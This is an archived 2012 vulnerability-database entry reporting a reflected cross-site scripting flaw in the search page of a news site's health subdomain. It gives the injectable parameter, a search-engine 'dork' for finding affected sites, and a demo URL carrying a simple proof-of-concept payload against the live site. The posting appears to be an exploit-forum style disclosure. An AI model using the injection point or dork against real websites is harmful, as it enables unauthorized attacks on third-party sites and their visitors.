NDTV Cross Site Scripting Vulnerabilitiy

2012-07-11T00:00:00
ID SECURITYVULNS:DOC:28281
Type securityvulns
Reporter Securityvulns
Modified 2012-07-11T00:00:00

Description

Exploit Title : NDTV Cross Site Scripting Vulnerabilitiy

Author : Iranian Security & Research Team

Discovered By : zilli0o0n

Home : sec-lab.ir

Contact : research [at] sec-lab [dot] ir

Software Link : www.ndtv.com #

DorK : "Copyright NDTV Convergence Limited 2012"

Expl0iTs:

[target]/Search.aspx?SearchText=[xss]

Dem0:

http://doctor.ndtv.com/Search.aspx?SearchText=<alert>'1'</alert>

We are : K0242 | Nafsh | Ehram.shahmohamadi

Greetz : All sec-lab researchers